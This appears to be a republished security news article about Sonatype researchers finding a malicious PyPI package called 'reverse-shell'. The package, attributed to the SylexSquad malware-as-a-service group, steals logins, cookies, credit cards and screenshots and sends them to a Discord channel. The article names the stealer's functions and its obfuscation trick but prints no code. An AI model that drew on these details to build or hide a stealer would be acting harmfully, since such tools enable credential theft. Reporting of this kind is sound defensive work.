Blatantly Obvious: Spyware Offered to Cyberattackers via PyPI Python Repository

  /     /     /  
Publicated : 23/11/2024   Category : security


Blatantly Obvious: Spyware Offered to Cyberattackers via PyPI Python Repository


Malware-as-a-service hackers from Spain decided to use a public code repository to openly advertise their wares.



Researchers have discovered malware peddlers advertising an info-stealer out in the open on the Python Package Index (PyPI) — the official, public repository for the Python programming language — with only the thinnest veneer of obfuscation.
The perpetrators — whom researchers from Sonatype associated with a Spain-based malware-as-aservice (MaaS) gang called SylexSquad — gave their program a not-so-subtle name: reverse-shell. Reverse shells are programs that hackers commonly use to run commands remotely and receive data from targeted computers.
I think whats quite funny about this is that its just so blatant, says Dan Conn, developer advocate at Sonatype. Perhaps SylexSquad were advertising themselves, or they simply didnt care about being caught.
However, their brazenness doesnt end there.
Sonatype researchers did a double-take when they found a package called reverse-shell uploaded to a public forum. Why would someone name a malicious package in such an blatantly obvious way? the researchers wondered in their
Malware Monthly blog post
.
The program turned out to be much more than a reverse shell, in fact. That became clear when the researchers examined one of its files, called WindowsDefender.py.
WindowsDefender.py includes various obviously named functions, including get_login_data(), get_web_history(), get_downloads(), get_cookies(), get_credit_cards(), and ImageGrab.grab(). Per the theme, the hackers had not tried hard to conceal their intentions: this was malware designed to steal information.
With no obfuscation, [this] appears to be ... a Discord bot that executes commands and performs actions on the infected machine, according to the analysis. The malware can retrieve cookies, take screenshots, run shell commands, steal browsing history, and send all this data to the attackers Discord channel.
Further answers lay in another file, setup.py. Here, there were several Spanish-language instructions to Clone GitHub repository and execute file, replace with URL of your GitHub repository, and path where you want to clone the repo — an indication that reverse-shell was a
MaaS
product.
Further digging uncovered multiple Made by SylexSquad tags scattered in the code, some of which was lightly obfuscated.
SylexSquad
, the researchers found, was once a hacking marketplace operating over the Sellix e-commerce platform in 2022. It has since been shut down.
Publishing so openly to a public repo may have been a way for the group to intentionally draw attention to their product. How do we know about groups like
Anonymous
or
LulzSec
or
Killnet
? Conn asks, rhetorically. Its because they get a reputation.
But PyPI holds much more value to them than that.
The SylexSquad attackers arent the only miscreants utilizing forums like PyPI and GitHub, and there are many reasons for such brazenness, according to Sonatype.
Hosting malicious files on a public repository provides bad actors more control over them, the researchers explained in their blog. It gives them the power of deleting, upgrading, or even doing version control of the payload.
Among other benefits, it allows the malware to be shared a lot more widely, Conn elaborates, and it might actually trip up, in particular, a lot of antivirus software that uses generic signatures — like, actual bytes — to store whether something is malicious or not.
In other words, rather than delivering malware upfront — which antivirus scanners can pick up on quickly — hackers can simply link to their malicious code elsewhere: By providing a link to a GitHub, theyre maybe circumventing that check,” he notes.
Public repositories have protective measures in place to avoid becoming a hub for hackers. Still, even the best scanners and moderators arent perfect, and they cant be everywhere at once.
Hackers take certain measures like encoding or otherwise obfuscating the code they host, to make it a little bit more difficult for automated engines to pick up, Juan Aguirre, security researcher at Sonatype, points out. In this case, SylexSquad encoded their malicious script as numbers, using easily reversible ASCII codes corresponding to each character.
In this case, Sonatype reported the package to the PyPI maintainers and it was taken down. But its just a game of cat and mouse, Aguirre says. Someone catches them and they just run to the next spot.
Aguirre views this story in light of a broader concern with open source software — that, as long as malware authors find use in public repositories, organizations must be aware of the
kinds of packages they might be sweeping up
.
Its important to understand what it is that youre running, he concludes. This is a great case for that. You have to have a
bill of materials
, youve got to know what youre doing, and what dependencies youre using. If youre just blindly installing things and grabbing code you see, things like this could very easily get into your system.

Last News

▸ Debunking Machine Learning in Security. ◂
Discovered: 23/12/2024
Category: security

▸ Researchers create BlackForest to gather, link threat data. ◂
Discovered: 23/12/2024
Category: security

▸ Travel agency fined £150,000 for breaking Data Protection Act. ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
Blatantly Obvious: Spyware Offered to Cyberattackers via PyPI Python Repository